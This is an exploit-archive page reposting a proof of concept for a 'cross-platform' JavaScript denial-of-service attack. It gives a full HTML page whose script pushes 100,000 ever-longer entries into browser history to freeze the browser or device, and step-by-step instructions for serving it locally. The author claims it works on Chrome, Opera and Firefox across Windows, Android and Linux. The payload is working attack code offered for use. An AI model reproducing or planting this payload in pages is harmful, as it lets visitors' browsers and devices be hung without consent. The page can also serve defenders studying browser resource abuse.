Advertisement






Cross-Platform Malicious Javascript DoS attack

CVE Category Price Severity
CVE-XXXX-XXXX CWE-XX $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2023-06-17
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023060037

Below is a copy:

Cross-Platform Malicious Javascript DoS attack
<!--
[?] WHAT IS THIS EXPLOIT CODE
==============================================================================
When these malicious javascript codes are run through the browser on a target system, they seriously force the system by manipulating the target's browser history. As a result, the device will freeze for a few minutes or the browser may be permanently damaged and the victim may have to download it again. This is directly proportional to the working time of the exploit. and a meaningless history list from 0 to 99,999 is formed in the browser history. The history list continues to be added as long as the run time. Operating systems such as Android, Windows, Linux can also be victims1 of this abuse. It also allows it to be affected in many browsers such as Chrome, Opera, Firefox 

[?] HOW TO WORK
==============================================================================
The code concatenates the numbers 0 to 99,999 and assigns them to a variable called "total" and then inserts each value into the browser history using the history.pushState() method.

[*] EXPLOIT HTML CODE
==============================================================================
-->

<!DOCTYPE html>                                 
<html>                                          
  <body>

     <h1>Welcome poc test!</h1>

     <script>

        var total = "";

        for( var i = 0; i < 100000; i++ ) {

        total = total + i.toString();

        history.pushState(0,0, total );
                                                                                                
       }

     </script>

  </body>

</html>

<!--
[!] HOW TO EXPLOIT POC TEST
==============================================================================
[1]: Save the code as .html extension.
[2]: Now we will listen to this exploit code from your localhost. For example, let's start the local server by saying python -m http.server 9001.
[3]: Then we will write the part of the URI where index.html is located on your system. If you are in the same directory as the exploit, you can open this link directly: 

http://127.0.0.1:9001/index.html

[+] Exploit work!

[*] TESTED ON: WINDOWS, ANDROID, LINUX
[*] TESTED BROWSERS: CHROME, OPERA, FIREFOX

contact: [email protected]

-->

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.